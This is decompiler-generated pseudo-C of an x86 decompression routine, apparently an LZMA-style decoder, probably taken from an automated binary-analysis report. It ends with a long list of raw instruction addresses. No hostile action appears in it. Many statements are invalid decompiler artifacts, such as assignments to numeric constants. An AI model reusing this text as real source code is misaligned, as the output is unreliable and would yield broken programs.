                							 *(__ebp - 0x54) = __esi;
                							__edx = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								 *(__ebp - 0x40) = 1;
                								__cx = __ax >> 5;
                								__ebx = __ebx + __ebx + 1;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edx;
                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                								__ebx = __ebx + __ebx;
                								 *__esi = __cx;
                							}
                							 *(__ebp - 0x44) = __ebx;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								L38:
                								__eax =  *(__ebp - 0x40);
                								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                									while(1) {
                										if(__ebx >= 0x100) {
                											break;
                										}
                										__eax =  *(__ebp - 0x58);
                										__edx = __ebx + __ebx;
                										__ecx =  *(__ebp - 0x10);
                										__esi = __edx + __eax;
                										__ecx =  *(__ebp - 0x10) >> 0xb;
                										__ax =  *__esi;
                										 *(__ebp - 0x54) = __esi;
                										__edi = __ax & 0x0000ffff;
                										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                										if( *(__ebp - 0xc) >= __ecx) {
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                											__cx = __ax;
                											_t169 = __edx + 1; // 0x1
                											__ebx = _t169;
                											__cx = __ax >> 5;
                											 *__esi = __ax;
                										} else {
                											 *(__ebp - 0x10) = __ecx;
                											0x800 = 0x800 - __edi;
                											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                											__ebx = __ebx + __ebx;
                											 *__esi = __cx;
                										}
                										 *(__ebp - 0x44) = __ebx;
                										if( *(__ebp - 0x10) < 0x1000000) {
                											L45:
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t155 = __ebp - 0x70;
                											 *_t155 =  *(__ebp - 0x70) + 1;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                										}
                									}
                									L53:
                									_t172 = __ebp - 0x34;
                									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                									L54:
                									__al =  *(__ebp - 0x44);
                									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                									L55:
                									if( *(__ebp - 0x64) == 0) {
                										 *(__ebp - 0x88) = 0x1a;
                										goto L170;
                									}
                									__ecx =  *(__ebp - 0x68);
                									__al =  *(__ebp - 0x5c);
                									__edx =  *(__ebp - 8);
                									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                									 *( *(__ebp - 0x68)) = __al;
                									__ecx =  *(__ebp - 0x14);
                									 *(__ecx +  *(__ebp - 8)) = __al;
                									__eax = __ecx + 1;
                									__edx = 0;
                									_t191 = __eax %  *(__ebp - 0x74);
                									__eax = __eax /  *(__ebp - 0x74);
                									__edx = _t191;
                									L79:
                									 *(__ebp - 0x14) = __edx;
                									L80:
                									 *(__ebp - 0x88) = 2;
                									goto L1;
                								}
                								if(__ebx >= 0x100) {
                									goto L53;
                								}
                								goto L40;
                							} else {
                								L36:
                								if( *(__ebp - 0x6c) == 0) {
                									 *(__ebp - 0x88) = 0xd;
                									L170:
                									_t568 = 0x22;
                									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                									_t535 = 0;
                									L172:
                									return _t535;
                								}
                								__ecx =  *(__ebp - 0x70);
                								__eax =  *(__ebp - 0xc);
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								_t121 = __ebp - 0x70;
                								 *_t121 =  *(__ebp - 0x70) + 1;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                								goto L38;
                							}
                						}
                					}
                					L1:
                					_t534 =  *(_t614 - 0x88);
                					if(_t534 > 0x1c) {
                						L171:
                						_t535 = _t534 | 0xffffffff;
                						goto L172;
                					}
                					switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                						case 0:
                							if( *(_t614 - 0x6c) == 0) {
                								goto L170;
                							}
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                							_t534 =  *( *(_t614 - 0x70));
                							if(_t534 > 0xe1) {
                								goto L171;
                							}
                							_t538 = _t534 & 0x000000ff;
                							_push(0x2d);
                							asm("cdq");
                							_pop(_t570);
                							_push(9);
                							_pop(_t571);
                							_t610 = _t538 / _t570;
                							_t540 = _t538 % _t570 & 0x000000ff;
                							asm("cdq");
                							_t605 = _t540 % _t571 & 0x000000ff;
                							 *(_t614 - 0x3c) = _t605;
                							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                							_t613 = (0x300 << _t605 + _t610) + 0x736;
                							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                								L10:
                								if(_t613 == 0) {
                									L12:
                									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                									goto L15;
                								} else {
                									goto L11;
                								}
                								do {
                									L11:
                									_t613 = _t613 - 1;
                									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                								} while (_t613 != 0);
                								goto L12;
                							}
                							if( *(_t614 - 4) != 0) {
                								GlobalFree( *(_t614 - 4));
                							}
                							_t534 = GlobalAlloc(0x40, 0x600); // executed
                							 *(_t614 - 4) = _t534;
                							if(_t534 == 0) {
                								goto L171;
                							} else {
                								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                								goto L10;
                							}
                						case 1:
                							L13:
                							__eflags =  *(_t614 - 0x6c);
                							if( *(_t614 - 0x6c) == 0) {
                								 *(_t614 - 0x88) = 1;
                								goto L170;
                							}
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                							_t45 = _t614 - 0x48;
                							 *_t45 =  *(_t614 - 0x48) + 1;
                							__eflags =  *_t45;
                							L15:
                							if( *(_t614 - 0x48) < 4) {
                								goto L13;
                							}
                							_t546 =  *(_t614 - 0x40);
                							if(_t546 ==  *(_t614 - 0x74)) {
                								L20:
                								 *(_t614 - 0x48) = 5;
                								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                								goto L23;
                							}
                							 *(_t614 - 0x74) = _t546;
                							if( *(_t614 - 8) != 0) {
                								GlobalFree( *(_t614 - 8));
                							}
                							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                							 *(_t614 - 8) = _t534;
                							if(_t534 == 0) {
                								goto L171;
                							} else {
                								goto L20;
                							}
                						case 2:
                							L24:
                							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                							 *(_t614 - 0x84) = 6;
                							 *(_t614 - 0x4c) = _t553;
                							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                							goto L132;
                						case 3:
                							L21:
                							__eflags =  *(_t614 - 0x6c);
                							if( *(_t614 - 0x6c) == 0) {
                								 *(_t614 - 0x88) = 3;
                								goto L170;
                							}
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							_t67 = _t614 - 0x70;
                							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                							__eflags =  *_t67;
                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                							L23:
                							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                							if( *(_t614 - 0x48) != 0) {
                								goto L21;
                							}
                							goto L24;
                						case 4:
                							goto L133;
                						case 5:
                							goto L137;
                						case 6:
                							goto L0;
                						case 7:
                							__eflags =  *(__ebp - 0x40) - 1;
                							if( *(__ebp - 0x40) != 1) {
                								__eax =  *(__ebp - 0x24);
                								 *(__ebp - 0x80) = 0x16;
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x28);
                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                								__eax =  *(__ebp - 0x2c);
                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                								__eax = 0;
                								__eflags =  *(__ebp - 0x38) - 7;
                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                								__al = __al & 0x000000fd;
                								__eax = (__eflags >= 0) - 1 + 0xa;
                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                								__eax =  *(__ebp - 4);
                								__eax =  *(__ebp - 4) + 0x664;
                								__eflags = __eax;
                								 *(__ebp - 0x58) = __eax;
                								goto L68;
                							}
                							__eax =  *(__ebp - 4);
                							__ecx =  *(__ebp - 0x38);
                							 *(__ebp - 0x84) = 8;
                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                							goto L132;
                						case 8:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xa;
                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                							} else {
                								__eax =  *(__ebp - 0x38);
                								__ecx =  *(__ebp - 4);
                								__eax =  *(__ebp - 0x38) + 0xf;
                								 *(__ebp - 0x84) = 9;
                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                							}
                							goto L132;
                						case 9:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								goto L89;
                							}
                							__eflags =  *(__ebp - 0x60);
                							if( *(__ebp - 0x60) == 0) {
                								goto L171;
                							}
                							__eax = 0;
                							__eflags =  *(__ebp - 0x38) - 7;
                							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                							__eflags = _t258;
                							0 | _t258 = _t258 + _t258 + 9;
                							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                							goto L75;
                						case 0xa:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 4);
                								__ecx =  *(__ebp - 0x38);
                								 *(__ebp - 0x84) = 0xb;
                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x28);
                							goto L88;
                						case 0xb:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__ecx =  *(__ebp - 0x24);
                								__eax =  *(__ebp - 0x20);
                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                							} else {
                								__eax =  *(__ebp - 0x24);
                							}
                							__ecx =  *(__ebp - 0x28);
                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                							L88:
                							__ecx =  *(__ebp - 0x2c);
                							 *(__ebp - 0x2c) = __eax;
                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                							L89:
                							__eax =  *(__ebp - 4);
                							 *(__ebp - 0x80) = 0x15;
                							__eax =  *(__ebp - 4) + 0xa68;
                							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                							goto L68;
                						case 0xc:
                							L99:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0xc;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t334 = __ebp - 0x70;
                							 *_t334 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t334;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							__eax =  *(__ebp - 0x2c);
                							goto L101;
                						case 0xd:
                							goto L36;
                						case 0xe:
                							goto L45;
                						case 0xf:
                							goto L57;
                						case 0x10:
                							L109:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x10;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t365 = __ebp - 0x70;
                							 *_t365 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t365;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							goto L111;
                						case 0x11:
                							L68:
                							__esi =  *(__ebp - 0x58);
                							 *(__ebp - 0x84) = 0x12;
                							goto L132;
                						case 0x12:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								__eax =  *(__ebp - 0x58);
                								 *(__ebp - 0x84) = 0x13;
                								__esi =  *(__ebp - 0x58) + 2;
                								goto L132;
                							}
                							__eax =  *(__ebp - 0x4c);
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							__eflags = __eax;
                							__eax =  *(__ebp - 0x58) + __eax + 4;
                							goto L130;
                						case 0x13:
                							__eflags =  *(__ebp - 0x40);
                							if( *(__ebp - 0x40) != 0) {
                								_t469 = __ebp - 0x58;
                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                								__eflags =  *_t469;
                								 *(__ebp - 0x30) = 0x10;
                								 *(__ebp - 0x40) = 8;
                								L144:
                								 *(__ebp - 0x7c) = 0x14;
                								goto L145;
                							}
                							__eax =  *(__ebp - 0x4c);
                							__ecx =  *(__ebp - 0x58);
                							__eax =  *(__ebp - 0x4c) << 4;
                							 *(__ebp - 0x30) = 8;
                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                							L130:
                							 *(__ebp - 0x58) = __eax;
                							 *(__ebp - 0x40) = 3;
                							goto L144;
                						case 0x14:
                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                							__eax =  *(__ebp - 0x80);
                							goto L140;
                						case 0x15:
                							__eax = 0;
                							__eflags =  *(__ebp - 0x38) - 7;
                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                							__al = __al & 0x000000fd;
                							__eax = (__eflags >= 0) - 1 + 0xb;
                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                							goto L120;
                						case 0x16:
                							__eax =  *(__ebp - 0x30);
                							__eflags = __eax - 4;
                							if(__eax >= 4) {
                								_push(3);
                								_pop(__eax);
                							}
                							__ecx =  *(__ebp - 4);
                							 *(__ebp - 0x40) = 6;
                							__eax = __eax << 7;
                							 *(__ebp - 0x7c) = 0x19;
                							 *(__ebp - 0x58) = __eax;
                							goto L145;
                						case 0x17:
                							L145:
                							__eax =  *(__ebp - 0x40);
                							 *(__ebp - 0x50) = 1;
                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                							goto L149;
                						case 0x18:
                							L146:
                							__eflags =  *(__ebp - 0x6c);
                							if( *(__ebp - 0x6c) == 0) {
                								 *(__ebp - 0x88) = 0x18;
                								goto L170;
                							}
                							__ecx =  *(__ebp - 0x70);
                							__eax =  *(__ebp - 0xc);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							_t484 = __ebp - 0x70;
                							 *_t484 =  *(__ebp - 0x70) + 1;
                							__eflags =  *_t484;
                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                							L148:
                							_t487 = __ebp - 0x48;
                							 *_t487 =  *(__ebp - 0x48) - 1;
                							__eflags =  *_t487;
                							L149:
                							__eflags =  *(__ebp - 0x48);
                							if( *(__ebp - 0x48) <= 0) {
                								__ecx =  *(__ebp - 0x40);
                								__ebx =  *(__ebp - 0x50);
                								0 = 1;
                								__eax = 1 << __cl;
                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                								__eax =  *(__ebp - 0x7c);
                								 *(__ebp - 0x44) = __ebx;
                								goto L140;
                							}
                							__eax =  *(__ebp - 0x50);
                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                							__eax =  *(__ebp - 0x58);
                							__esi = __edx + __eax;
                							 *(__ebp - 0x54) = __esi;
                							__ax =  *__esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							__eflags =  *(__ebp - 0xc) - __ecx;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								__cx = __ax >> 5;
                								__eax = __eax - __ecx;
                								__edx = __edx + 1;
                								__eflags = __edx;
                								 *__esi = __ax;
                								 *(__ebp - 0x50) = __edx;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                								 *__esi = __cx;
                							}
                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                							if( *(__ebp - 0x10) >= 0x1000000) {
                								goto L148;
                							} else {
                								goto L146;
                							}
                						case 0x19:
                							__eflags = __ebx - 4;
                							if(__ebx < 4) {
                								 *(__ebp - 0x2c) = __ebx;
                								L119:
                								_t393 = __ebp - 0x2c;
                								 *_t393 =  *(__ebp - 0x2c) + 1;
                								__eflags =  *_t393;
                								L120:
                								__eax =  *(__ebp - 0x2c);
                								__eflags = __eax;
                								if(__eax == 0) {
                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                									goto L170;
                								}
                								__eflags = __eax -  *(__ebp - 0x60);
                								if(__eax >  *(__ebp - 0x60)) {
                									goto L171;
                								}
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                								__eax =  *(__ebp - 0x30);
                								_t400 = __ebp - 0x60;
                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                								__eflags =  *_t400;
                								goto L123;
                							}
                							__ecx = __ebx;
                							__eax = __ebx;
                							__ecx = __ebx >> 1;
                							__eax = __ebx & 0x00000001;
                							__ecx = (__ebx >> 1) - 1;
                							__al = __al | 0x00000002;
                							__eax = (__ebx & 0x00000001) << __cl;
                							__eflags = __ebx - 0xe;
                							 *(__ebp - 0x2c) = __eax;
                							if(__ebx >= 0xe) {
                								__ebx = 0;
                								 *(__ebp - 0x48) = __ecx;
                								L102:
                								__eflags =  *(__ebp - 0x48);
                								if( *(__ebp - 0x48) <= 0) {
                									__eax = __eax + __ebx;
                									 *(__ebp - 0x40) = 4;
                									 *(__ebp - 0x2c) = __eax;
                									__eax =  *(__ebp - 4);
                									__eax =  *(__ebp - 4) + 0x644;
                									__eflags = __eax;
                									L108:
                									__ebx = 0;
                									 *(__ebp - 0x58) = __eax;
                									 *(__ebp - 0x50) = 1;
                									 *(__ebp - 0x44) = 0;
                									 *(__ebp - 0x48) = 0;
                									L112:
                									__eax =  *(__ebp - 0x40);
                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                										_t391 = __ebp - 0x2c;
                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                										__eflags =  *_t391;
                										goto L119;
                									}
                									__eax =  *(__ebp - 0x50);
                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                									__eax =  *(__ebp - 0x58);
                									__esi = __edi + __eax;
                									 *(__ebp - 0x54) = __esi;
                									__ax =  *__esi;
                									__ecx = __ax & 0x0000ffff;
                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                									__eflags =  *(__ebp - 0xc) - __edx;
                									if( *(__ebp - 0xc) >= __edx) {
                										__ecx = 0;
                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                										__ecx = 1;
                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                										__ebx = 1;
                										__ecx =  *(__ebp - 0x48);
                										__ebx = 1 << __cl;
                										__ecx = 1 << __cl;
                										__ebx =  *(__ebp - 0x44);
                										__ebx =  *(__ebp - 0x44) | __ecx;
                										__cx = __ax;
                										__cx = __ax >> 5;
                										__eax = __eax - __ecx;
                										__edi = __edi + 1;
                										__eflags = __edi;
                										 *(__ebp - 0x44) = __ebx;
                										 *__esi = __ax;
                										 *(__ebp - 0x50) = __edi;
                									} else {
                										 *(__ebp - 0x10) = __edx;
                										0x800 = 0x800 - __ecx;
                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                										 *__esi = __dx;
                									}
                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                									if( *(__ebp - 0x10) >= 0x1000000) {
                										L111:
                										_t368 = __ebp - 0x48;
                										 *_t368 =  *(__ebp - 0x48) + 1;
                										__eflags =  *_t368;
                										goto L112;
                									} else {
                										goto L109;
                									}
                								}
                								__ecx =  *(__ebp - 0xc);
                								__ebx = __ebx + __ebx;
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                								 *(__ebp - 0x44) = __ebx;
                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                									__ecx =  *(__ebp - 0x10);
                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                									__ebx = __ebx | 0x00000001;
                									__eflags = __ebx;
                									 *(__ebp - 0x44) = __ebx;
                								}
                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                								if( *(__ebp - 0x10) >= 0x1000000) {
                									L101:
                									_t338 = __ebp - 0x48;
                									 *_t338 =  *(__ebp - 0x48) - 1;
                									__eflags =  *_t338;
                									goto L102;
                								} else {
                									goto L99;
                								}
                							}
                							__edx =  *(__ebp - 4);
                							__eax = __eax - __ebx;
                							 *(__ebp - 0x40) = __ecx;
                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                							goto L108;
                						case 0x1a:
                							goto L55;
                						case 0x1b:
                							L75:
                							__eflags =  *(__ebp - 0x64);
                							if( *(__ebp - 0x64) == 0) {
                								 *(__ebp - 0x88) = 0x1b;
                								goto L170;
                							}
                							__eax =  *(__ebp - 0x14);
                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                							__eflags = __eax -  *(__ebp - 0x74);
                							if(__eax >=  *(__ebp - 0x74)) {
                								__eax = __eax +  *(__ebp - 0x74);
                								__eflags = __eax;
                							}
                							__edx =  *(__ebp - 8);
                							__cl =  *(__eax + __edx);
                							__eax =  *(__ebp - 0x14);
                							 *(__ebp - 0x5c) = __cl;
                							 *(__eax + __edx) = __cl;
                							__eax = __eax + 1;
                							__edx = 0;
                							_t274 = __eax %  *(__ebp - 0x74);
                							__eax = __eax /  *(__ebp - 0x74);
                							__edx = _t274;
                							__eax =  *(__ebp - 0x68);
                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                							_t283 = __ebp - 0x64;
                							 *_t283 =  *(__ebp - 0x64) - 1;
                							__eflags =  *_t283;
                							 *( *(__ebp - 0x68)) = __cl;
                							goto L79;
                						case 0x1c:
                							while(1) {
                								L123:
                								__eflags =  *(__ebp - 0x64);
                								if( *(__ebp - 0x64) == 0) {
                									break;
                								}
                								__eax =  *(__ebp - 0x14);
                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                								__eflags = __eax -  *(__ebp - 0x74);
                								if(__eax >=  *(__ebp - 0x74)) {
                									__eax = __eax +  *(__ebp - 0x74);
                									__eflags = __eax;
                								}
                								__edx =  *(__ebp - 8);
                								__cl =  *(__eax + __edx);
                								__eax =  *(__ebp - 0x14);
                								 *(__ebp - 0x5c) = __cl;
                								 *(__eax + __edx) = __cl;
                								__eax = __eax + 1;
                								__edx = 0;
                								_t414 = __eax %  *(__ebp - 0x74);
                								__eax = __eax /  *(__ebp - 0x74);
                								__edx = _t414;
                								__eax =  *(__ebp - 0x68);
                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                								__eflags =  *(__ebp - 0x30);
                								 *( *(__ebp - 0x68)) = __cl;
                								 *(__ebp - 0x14) = __edx;
                								if( *(__ebp - 0x30) > 0) {
                									continue;
                								} else {
                									goto L80;
                								}
                							}
                							 *(__ebp - 0x88) = 0x1c;
                							goto L170;
                					}
                				}
                			}













                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406322
                0x00406326
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x00000000
                0x00000000
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x00000000
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406444
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x00000000
                0x0040645b
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
